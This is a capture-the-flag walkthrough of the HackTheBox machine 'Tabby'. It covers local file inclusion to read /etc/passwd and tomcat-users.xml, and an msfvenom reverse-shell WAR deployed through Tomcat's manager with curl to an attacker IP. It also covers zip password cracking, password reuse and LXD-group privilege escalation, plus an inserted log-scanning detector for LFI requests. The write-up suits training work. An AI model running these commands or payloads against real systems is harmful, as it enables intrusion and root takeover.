Tabby — HackTheBox

y4th0ts
Nov 7, 2020

Summary

Tabby is an easy-rated Linux machine created by egre55. The initial foothold is obtained by discovering Tomcat credentials with the help of a Local File Inclusion vulnerability. Access as the tomcat user is gained by deploying a WAR file containing a reverse shell payload through the Tomcat manager text interface. Lateral movement to the ash user is achieved through a reused password, and root privileges are obtained by abusing the system container manager (LXD) group, of which ash is a member.

Reconnaissance

Nmap scan results show ports 22 (ssh) and 80 (http) open, plus Apache Tomcat running on port 8080 (http).

Visiting port 80 displays a hosting company site. None of the hyperlinks lead anywhere except for ‘News’ and the link at the bottom about a statement regarding a recent data breach. Both lead to the same page.

Clicking the news text directs me to
‘http://megahosting.htb/news.php?file=statement’
I added megahosting.htb to my hosts file so that the page would resolve.

Local File Inclusion

Now we can browse the page.

The first thing I noticed was the file parameter in the URL. I tested it for Local File Inclusion right away, and it is indeed vulnerable: I was able to view the contents of /etc/passwd.

I intercepted the request in Burp Suite in order to fuzz more efficiently. /etc/passwd also reveals the user we will try to compromise: ‘ash’.

Visiting port 8080 displays a default Apache Tomcat page.

Accessing /manager requires authentication. Trying default credentials did not work, so I went back to fuzzing the LFI vulnerability for configuration files.
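As an added defensive example (not part of the original writeup), the following Python scans Apache access-log lines for the kind of requests the LFI above produces: traversal sequences, absolute paths and sensitive filenames inside query parameters. The log lines are constructed, and TOMCAT_CONF_DIR is a placeholder path component, not the real location of tomcat-users.xml.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample access-log lines (common log format); not taken from the target.
SAMPLE_LOG = """\
10.10.14.174 - - [07/Nov/2020:10:01:02 +0000] "GET /news.php?file=statement HTTP/1.1" 200 1810
10.10.14.174 - - [07/Nov/2020:10:01:30 +0000] "GET /news.php?file=../../../../etc/passwd HTTP/1.1" 200 2437
10.10.14.174 - - [07/Nov/2020:10:02:11 +0000] "GET /news.php?file=..%2F..%2F..%2F..%2FTOMCAT_CONF_DIR%2Ftomcat-users.xml HTTP/1.1" 200 2115
10.10.14.174 - - [07/Nov/2020:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 14175
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Filenames whose inclusion through a web parameter is never legitimate.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "tomcat-users.xml")


def classify_request(target: str) -> list:
    """Return the reasons a request target looks like an LFI attempt (empty list if benign)."""
    reasons = []
    _path, _, query = target.partition("?")
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            # parse_qs decodes once; decode again so %252e-style double encoding is caught too.
            value = unquote(raw)
            segments = value.replace("\\", "/").split("/")
            if ".." in segments:
                reasons.append(f"{name}: directory traversal")
            if value.startswith("/"):
                reasons.append(f"{name}: absolute path")
            if any(s in value.lower() for s in SENSITIVE):
                reasons.append(f"{name}: sensitive file")
            if "\x00" in value:
                reasons.append(f"{name}: null byte")
    return reasons


def scan_log(text: str) -> list:
    """Parse each log line and keep the ones that look like LFI attempts.

    A 2xx status with a non-trivial response size on a flagged request is the
    strongest sign that the inclusion actually succeeded and needs triage."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m["target"])
        if reasons:
            hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"],
                         "status": int(m["status"]), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], hit["target"], "->", ", ".join(hit["reasons"]))
```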

Initial Foothold

After a lot of research into Apache Tomcat’s directory structure and plenty of fuzzing, I finally found the tomcat-users.xml file, which contains credentials.

The username is tomcat and the password is $3cureP4s5w0rd123!

After authenticating, the page still says access denied. This is due to the roles assigned to the tomcat user.

Looking back at the XML file, we can see that the user has the admin-gui and manager-script roles. manager-script grants access to the text interface (/manager/text) but not to the HTML manager application, which is why the browser login is refused.

I found the Apache Tomcat documentation that describes the commands we are allowed to run through the text interface. Running the list command lists all the applications deployed on the server.

We will abuse the deploy command to upload a reverse shell payload. Using msfvenom, we can create the WAR file containing the reverse shell.

msfvenom -p java/shell_reverse_tcp lhost=10.10.14.174 lport=443 -f war > shell.war

The deploy commands demonstrated in the documentation were not helpful in this situation, so I looked for alternatives and found this solution on Stack Overflow, which I modified slightly. It is important to escape the ‘$’ character in the password so the shell does not expand it; otherwise authentication fails.

curl -X PUT -v -u "tomcat:\$3cureP4s5w0rd123!" -T shell.war 'http://tabby.htb:8080/manager/text/deploy?path=/tabby.test&update=true'

We can now trigger the payload by browsing to http://tabby.htb:8080/tabby.test

Lateral Movement to Ash

After gaining access, I found an interesting backup archive named ‘16162020_backup.zip’.

I downloaded it to my local machine to enumerate its contents, but it was password protected.

I used fcrackzip to brute-force the password, which is admin@it

The files inside the archive are the same as the ones hosted on the target’s web server, so I did not find anything useful in them. However, I tried switching to the ash user with the same password used to unzip the archive and successfully logged in as ash. We can now grab the user flag.

Privilege Escalation

Ash is a member of the system container manager (LXD) group, which can be leveraged to gain root privileges.

I found this article that explains exactly how to abuse LXD. First, we need to download lxd-alpine-builder and build an Alpine image as a compressed archive.

git clone https://github.com/saghul/lxd-alpine-builder.git

After building the compressed Alpine image, we transfer it to the target machine. I renamed the file to alpine.tar.gz because the original filename is long.

After transferring the Alpine image, we can start the exploitation. Run the following commands in ash’s home directory, where the Alpine image is also located.

1. lxc image import ./alpine.tar.gz --alias myimage
2. lxc image list (not necessary, but confirms that the image was imported)

The next commands create a privileged container from the imported image and mount the host’s ‘/’ directory at ‘/mnt/root’ inside the container.

3. lxc init myimage root -c security.privileged=true
4. lxc config device add root mydevice disk source=/ path=/mnt/root recursive=true
5. lxc start root
6. lxc exec root /bin/sh

Running lxc exec gives us a root shell inside the container. Because the container is privileged and the host’s ‘/’ is mounted at /mnt/root, we can access the host filesystem from there and grab the root flag.

That is all for Tabby! Thanks for reading. Have a good day all!
